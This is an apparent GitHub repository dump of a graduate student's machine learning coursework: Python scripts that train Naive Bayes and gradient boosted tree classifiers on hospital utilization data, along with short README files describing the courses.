train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.xlabel('Max Depth')\nplt.ylabel('Accuracy')\nplt.show()\nfig2.savefig(\"Race_max_depth\", dpi = 300)\n\n#Test mean: array([ 0.76343317, 0.75716423])\n\n#==============================================================================\n# Gradient Boosted Validation Curve learning rate\n#==============================================================================\n\nparam_range = [0.2, 0.5, 1.0]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__learning_rate\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig3 = plt.figure()\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.xlabel('Learning Rate')\nplt.ylabel('Accuracy')\nplt.show()\nfig3.savefig(\"Race_learningRate\", dpi = 300)\n#test mean [ 0.76304508, 0.75623917, 0.72835851]\n\n#==============================================================================\n# Cross Validation Curve with Cross Val Score\n#==============================================================================\n\nfrom sklearn.model_selection import cross_val_score\n\npipeGbcVal = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 300, min_samples_split=20, learning_rate= 0.2))])\nscores = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n# scores: array([ 0.77270353, 0.7319603 , 0.77404671, 0.77341593, 0.76518883])\n\npipeGbcVal500 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 500, min_samples_split=20, learning_rate= 0.2))])\nscores500 = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n# scores500: array([ 0.77106186, 0.72733378, 0.77203194, 0.77341593, 0.77078668])\n\npipeGbcVal1000 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 1000, min_samples_split=20, learning_rate= 0.2))])\nscores1000 = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n#scores1000: array([ 0.76636072, 0.72830386, 0.76755466, 0.7731174 , 0.77011494])\n \n\nimport matplotlib.pyplot as plt\nfigGbCv = plt.figure()\nplt.plot(np.arange(1,6), scores, marker='o', markersize=5,\n label='GBT (n_estimators = 300)')\n\n\nplt.plot(np.arange(1,6), scores500, marker='o', markersize=5,\n label='GBT (n_estimators = 500)')\n\n\nplt.plot(np.arange(1,6), scores100, marker='o', markersize=5,\n label='GBT (n_estimators = 1000)')\nplt.ylim(0.720, 0.780)\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Cross Validation Iteration')\nplt.ylabel('Cross Validated Accuracy: Race')\nplt.title(\"Gradient Boosted Trees: 5-fold Cross Validation\")\nplt.show()\nfigGbCv.savefig(\"Race_GbtCv\", dpi = 300)\n\n" }, { "alpha_fraction": 0.8135592937469482, "alphanum_fraction": 0.8135592937469482, "avg_line_length": 116, "blob_id": "df34cffbbf419f6b275516a6b8f10fa9aea9cee5", "content_id": "befd909109dfb45c4d0926db4a270009402c12b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 118, "license_type": "no_license", "max_line_length": 116, "num_lines": 1, "path": "/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This repository contains work by David Robison for coursework as part of his Master Degree at George Washington University. \n" }, { "alpha_fraction": 0.5127201676368713, "alphanum_fraction": 0.5765877962112427, "avg_line_length": 38.424560546875, "blob_id": "78ebb74736271068c9d4e22f1517efa67d83a1ae", "content_id": "ff22507934c1812752c1782068d88ab68a42051f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11242, "license_type": "no_license", "max_line_length": 164, "num_lines": 285, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/ASOURCE_bNB_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 11:23:31 2017\n\n@author: davidrobison\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 10:22:25 2017\n\n@author: davidrobison\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 14).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\ndfBernouli = df[[\"ASOURCE\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXsourceBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'ASOURCE'])\nySourceBnb = np.array(dfBernouli.loc[:,\"ASOURCE\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XsourceBnb, ySourceBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of Race\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[20,25,30])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_micro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nBnbMatrix = confusion_matrix(BnbPreds, y_testBnb)\n\n# Counter({5: 91049, 1: 34008, 2: 4810, 3: 4109, 4: 24})\n# Percentages: (5, 67.94701492537314), (1, 25.379104477611943), (2, 3.58955223880597), (3, 3.066417910447761), (4, 0.01791044776119403)]\n\n# precision recall f1-score support\n# \n# 1 0.11 0.35 0.17 5207\n# 2 0.01 0.26 0.03 137\n# 3 0.05 0.14 0.07 700\n# 4 0.00 0.00 0.00 0\n# 5 0.93 0.69 0.79 59956\n# \n# avg / total 0.85 0.66 0.73 66000\n# \n# \n# Accuracy Score: 0.65746969697\n#==============================================================================\nbestModelBnb = gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'SOURCE_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXsourceGb = np.array(df.loc[:, df.columns != 'ASOURCE'])\nysourceGb = np.array(df.loc[:,\"ASOURCE\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nestimators = [50, 100]\nlearningRate = [0.1, 0.2, 0.3, 0.4]\n\nparamGridGbc = [{\n \"clf__n_estimators\":estimators,\n \"clf__learning_rate\":learningRate}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XsourceGb, ysourceGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\njoblib.dump(bestModelGb, 'SOURCE_GbBestModel.pkl', compress = 9)\n\n\n# Best Parameters: {'clf__learning_rate': 0.4, 'clf__n_estimators': 100}\n# precision recall f1-score support\n# \n# 1 0.91 0.96 0.93 8402\n# 2 0.75 0.56 0.64 1185\n# 3 0.61 0.29 0.39 1101\n# 4 0.25 0.11 0.15 9\n# 5 0.95 0.97 0.96 22303\n# \n# avg / total 0.92 0.93 0.92 33000\n# \n# Accuracy Score: 0.926909090909\n#==============================================================================\n\n\n#Begin Validation Curve for Parameter Tuning \n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 11).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXsource = np.array(df.loc[:, df.columns != 'ASOURCE'])\nySource = np.array(df.loc[:,\"ASOURCE\"])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(Xsource, ySource, test_size=0.33, random_state=42)\n\npipelr = Pipeline([ \n # (\"pca\", PCA(n_components=5)), #actually performs worse with PCA \n (\"clf\", GradientBoostingClassifier(learning_rate = 0.2))])\n \nfrom sklearn.model_selection import validation_curve\n\n#==============================================================================\n# Gradient Boosted Validation Curve min_samples_split\n#==============================================================================\n\nparam_range = [3,10, 20]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__min_samples_split\",\n param_range = param_range,\n cv = 5)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig1source = plt.figure()\nplt.plot(param_range, train_mean, marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15)\nplt.plot(param_range, test_mean, linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15)\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Min Samples Split')\nplt.ylabel('Accuracy')\nplt.title(\"ASOURCE Validation Curve: min_samples_split\")\nplt.show()\nfig1source.savefig(\"source_min_samples\", dpi = 300)\n# test_mean: array([ 0.91811976, 0.91788098, 0.91797046])\n\n#==============================================================================\n# Gradient Boosted Validation Curve max_depth\n#==============================================================================\n\nparam_range = [3, 20]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__max_depth\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nfig2 = plt.figure()\nimport matplotlib.pyplot as plt\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.title(\"ASOURCE Validation Curve: max_depth\")\nplt.xlabel('Max Depth')\nplt.ylabel('Accuracy')\nplt.show()\nfig2.savefig(\"Source_max_depth\", dpi = 300)\n\n#Test mean: array([ 0.76343317, 0.75716423])\n\n\n#==============================================================================\n# Cross Validation Curve with Cross Val Score\n#==============================================================================\n\npipeGbcVal = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 300, min_samples_split=20, learning_rate= 0.4))])\nscores = cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n# scores: array([ 0.77270353, 0.7319603 , 0.77404671, 0.77341593, 0.76518883])\n\npipeGbcVal500 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 500, min_samples_split=20, learning_rate= 0.4))])\nscores500 = cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n# scores500: array([ 0.77106186, 0.72733378, 0.77203194, 0.77341593, 0.77078668])\n\npipeGbcVal1000 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 1000, min_samples_split=20, learning_rate= 0.2))])\nscores1000 = cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n#scores1000: array([ 0.76636072, 0.72830386, 0.76755466, 0.7731174 , 0.77011494])\n\n\nimport matplotlib.pyplot as plt\nfigGbSourceCv = plt.figure()\nplt.plot(np.arange(1,6), scores, marker='o', markersize=5,\n label='GBT (n_estimators = 300)')\n\n\nplt.plot(np.arange(1,6), scores500, marker='o', markersize=5,\n label='GBT (n_estimators = 500)')\n\n\nplt.plot(np.arange(1,6), scores1000, marker='o', markersize=5,\n label='GBT (n_estimators = 1000)')\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Cross Validation Iteration')\nplt.ylabel('Cross Validated Accuracy: ASOURCE')\nplt.title(\"Gradient Boosted Trees: 5-fold Cross Validation\")\nplt.show()\nfigGbSourceCv.savefig(\"SOURCE_GbtCv\", dpi = 300)\n \n\n\n" }, { "alpha_fraction": 0.7987805008888245, "alphanum_fraction": 0.8109756112098694, "avg_line_length": 162, "blob_id": "ae6be5e17e5435b5759603cc86992e83ddfe531c", "content_id": "8be801ca0be1139b555511fe4436131155550ab4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "no_license", "max_line_length": 162, "num_lines": 1, "path": "/Introduction to Data Mining/Midterm/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Files in this folder are related to a mid-term project that assessed Military Spending and Gross Domestic Product for G-20 nations using data from the World Bank. \n" }, { "alpha_fraction": 0.7817258834838867, "alphanum_fraction": 0.796954333782196, "avg_line_length": 195, "blob_id": "5431133727323bc31a7bf681be21c2d5f4371daa", "content_id": "d989391785dc7ec0d3ad6e997fbec82be1d3897f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 197, "license_type": "no_license", "max_line_length": 195, "num_lines": 1, "path": "/SQL and NoSQL Database Management/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code from my course learning how to interact with SQL and NoSQL databases including Dynamo, Mongo, Neo4j, and Hadoop instances using PyMySQL, Boto3, Robo3T, etc.. \n" }, { "alpha_fraction": 0.8336713910102844, "alphanum_fraction": 0.8336713910102844, "avg_line_length": 491, "blob_id": "0434e48ef9417411d5125d9ec978047e5898d50c", "content_id": "e3d11af6bd90f29af9651b3f082ec104c8004523", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 493, "license_type": "no_license", "max_line_length": 491, "num_lines": 1, "path": "/Introduction to Data Mining/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Introduction to Data Mining course. This course explored the use of Python pandas, numpy, and matplotlib packages for cleaning and wrangling multiple data sources, performing numerical operations, and visualizing data. My term-projects focused on demonstrating ability to use packages by analyzing World Bank military spending data and state-level community health and hospital readmissions data from the CDC and CMS. \n" }, { "alpha_fraction": 0.8244680762290955, "alphanum_fraction": 0.8244680762290955, "avg_line_length": 186, "blob_id": "fda87165773a76ae3e45bfdde380fd9e98364c4d", "content_id": "42a85aeed5e39589249ed3f0adb77168bdac4465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 186, "num_lines": 1, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This code contains python scripts for running Bernouli Naive Bayes and Gradient Boosted Decision Tree classifiers for variables of interest in this project. The primary author is David Robison. \n" }, { "alpha_fraction": 0.8449304103851318, "alphanum_fraction": 0.8449304103851318, "avg_line_length": 501, "blob_id": "5b1e22620e7d2849683a3ce4af20fa5e04c0b0b3", "content_id": "18edbb876cbac2aa87d6e74dbc0dc5a1554e0b56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 503, "license_type": "no_license", "max_line_length": 501, "num_lines": 1, "path": "/Bayesian Methods/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Bayesian Methods. This course explored foundations of Bayesian data analysis and application of Markov Chain Monte Carlo processes for parameter estimation, prediction, and model comparison with R packages of JAGS and Stan. My term-project compared performance of Bayesian and Lasso Regularized Logistic Regression, and Random Forest for predicting diabetes hospital readmissions using data from UCI Machine Learning repository\n\n" }, { "alpha_fraction": 0.9024389982223511, "alphanum_fraction": 0.9024389982223511, "avg_line_length": 40, "blob_id": "34d29c0cde5ea1d6a1f6c0f185f4b5baa54fbf69", "content_id": "a14d786222f7bafe95798db171d72445d169f93b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/Introduction to Data Science/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Exploratory Data Analysis Visualizations\n" }, { "alpha_fraction": 0.828125, "alphanum_fraction": 0.828125, "avg_line_length": 62, "blob_id": "46a00bee6da25be135363c5341e617bf150dde73", "content_id": "8b95d7ab05d7c4d0f7634eb9e1c933bfe3f91201", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 64, "license_type": "no_license", "max_line_length": 62, "num_lines": 1, "path": "/Machine Learning I/Final/GridSearch Figures/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Figures from gridsearch for optimal tuning parameters for MLP. \n" }, { "alpha_fraction": 0.8403100967407227, "alphanum_fraction": 0.8403100967407227, "avg_line_length": 213, "blob_id": "3229ae1b3e50c7df9b7646781d573590a5255a21", "content_id": "bad176f120950a76e91d48d9ab9b4c079da32fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "no_license", "max_line_length": 320, "num_lines": 3, "path": "/Machine Learning I/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Machine Learning I course. This course investigated parametric and non-parametric supervised and unsupervised machine learning models with focus on Bayesian inference frameworks and neural networks as well as techniques for dimension reduction. \n\nMy term-project used scikit-learn and keras Python packages to compare the performance Naïve Bayes, Random Forest, and Neural Network models for multi-label classification of variables in the Healthcare Cost and Utilization Project hospital dataset with use of synthetic resampling techniques to address class imbalance. \n\n\n" }, { "alpha_fraction": 0.5117626786231995, "alphanum_fraction": 0.5773951411247253, "avg_line_length": 37.33987045288086, "blob_id": "18f219f08e98592cce4b267d14c262b1514883a1", "content_id": "c9a93ecd793d00bdfe97d89b4e330652a35d05c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5866, "license_type": "no_license", "max_line_length": 164, "num_lines": 153, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/TOTCHG_bNb_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 10:48:38 2017\n\n@author: davidrobison\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 16).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\nlabels = ['1', '2', '3', '4', '5'] #just class labels we'll call 1-5\n\nbins = [0, 1000, 5000, 10000, 20000, 1500000]\n\ndf = df.assign(TOTCHG = pd.cut(df.TOTCHG, bins, labels=labels)) #add a new column with our cuts\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\n\ndfBernouli = df[[\"TOTCHG\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\nfrom sklearn.preprocessing import LabelEncoder\nlabelencoder =LabelEncoder() \ndfBernouli.loc[:,\"TOTCHG\"] = labelencoder.fit_transform(dfBernouli.loc[:,\"TOTCHG\"].cat.codes)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXtotchgBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'TOTCHG'])\nyTotchgBnb = np.array(dfBernouli.loc[:,\"TOTCHG\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XtotchgBnb, yTotchgBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of TOTCHG\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[15, 20, 25])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_macro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nprint(BnbReport)\nprint(BnbScore)\n\nbestModelBnb = gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'TOTCHG_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# Best Params: {'feature_selection__k': 25}\n# Distribution: [(4, 32.88208955223881), (3, 24.6955223880597), (2, 24.459701492537313), \n# (1, 17.313432835820898), (0, 0.6492537313432836)]\n# \n# precision recall f1-score support\n# \n# 0 0.00 0.00 0.00 0\n# 1 0.45 0.36 0.40 7065\n# 2 0.30 0.33 0.32 7313\n# 3 0.16 0.30 0.21 4328\n# 4 0.68 0.52 0.59 14294\n# \n# avg / total 0.48 0.42 0.44 33000\n# \n# Accuracy Score: 0.415848484848\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXtotchgGb = np.array(df.loc[:, df.columns != 'TOTCHG'])\nyTotchgGb = np.array(df.loc[:,\"TOTCHG\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nlearning = [0.1]\nsamplesSplit = [30,50]\n\nparamGridGbc = [{\n \"clf__min_samples_split\":samplesSplit,\n \"clf__learning_rate\":learning}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XtotchgGb, yTotchgGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'TOTCHG_GBModel.pkl', compress = 9)\n\n#==============================================================================\n# Best Params: {'clf__learning_rate': 0.2, 'clf__min_samples_split': 30}\n# precision recall f1-score support\n# \n# 1 0.81 0.52 0.64 232\n# 2 0.75 0.73 0.74 5627\n# 3 0.63 0.70 0.66 8025\n# 4 0.63 0.57 0.60 8162\n# 5 0.85 0.86 0.86 10954\n# \n# avg / total 0.73 0.73 0.72 33000\n# \n# Accuracy Score: 0.725757575758\n#==============================================================================\n" }, { "alpha_fraction": 0.8363636136054993, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 53, "blob_id": "08b440b866aca4f19ff585e47fd4f847c27b5603", "content_id": "4e16d2ae7505aecc9a61153d075a3211e00fd885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 53, "num_lines": 1, "path": "/Introduction to Data Mining/Midterm/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains visualizations from the project. \n" }, { "alpha_fraction": 0.8274853825569153, "alphanum_fraction": 0.8274853825569153, "avg_line_length": 340, "blob_id": "bd1044e03e5af764b6e0340835154248d9e64d0f", "content_id": "6d06437ae6335ab25fb6e1d28bc8ef9e87b21b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 342, "license_type": "no_license", "max_line_length": 340, "num_lines": 1, "path": "/Introduction to Data Science/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a Powerpoint report from my Introduction to Data Science Course. This term-project analyzed roadway data collected by the City of Philadelphia to predict probabilities of seatbelt use by vehicle occupants involved in accidents, creating risk profiles by age, gender, and time of day. \n" } ]
23
ousamg/patientMatcher
https://github.com/ousamg/patientMatcher
3d11979d833ee162203227aadac99e27ef7f3f15
c5411e1a01ada9c2e4033ce54c55b5f2c954cdac
55a8c3134eb492fa59152f342c69969faee02d72
refs/heads/master
2021-06-27T01:56:03.151146
2020-10-19T12:57:56
2020-10-19T12:57:56
167,567,777
0
0
null
2019-01-25T15:21:59
2019-01-25T11:58:19
2019-01-25T13:18:09
null
